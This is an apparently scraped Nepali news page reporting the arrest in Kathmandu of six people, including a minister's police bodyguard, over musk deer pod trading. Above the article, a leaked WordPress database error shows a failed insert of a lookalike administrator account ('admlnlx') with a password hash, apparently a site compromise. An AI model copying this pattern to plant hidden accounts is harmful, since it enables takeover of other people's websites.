WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bv0EWmWzMThAw9tEH/b3gxUQsf7mXy1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 04:30:04', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २३ असार, काठमाडौं । कस्तुरीको बिना कारोबारमा संलग्नको आरोपमा काठमाडौँबाट एक प्रहरीसहित छ जना पक्राउ परेका छन् ।
महानगरीय प्रहरी कर्यालय काठमाडौंका प्रवक्ता श्यामलाल ज्ञवालीले प्रहरी हबल्दार बमबहादुर चन्दसहित ६ जनालाई कस्तुरीको बिनासहित पक्राउ गरेको पुष्टि गरे ।
प्रहरी हवल्दार चन्द पूर्वमन्त्री एवं नेकपा नेता दीनानाथ शर्माका अंगरक्षक हुन् । पक्राउ परेका अन्य व्यक्तिको पहिचान भने खुलाइएको छैन ।
महानगरीय प्रहरी कर्यालय काठमाडौंका अनुसार सोमबार दिउँसो पत्रकार सम्मेलन गरेर उनीहरुलाई सार्वजनिक गर्ने तयारी गरिएकाे छ । सभार अनलाईनखबर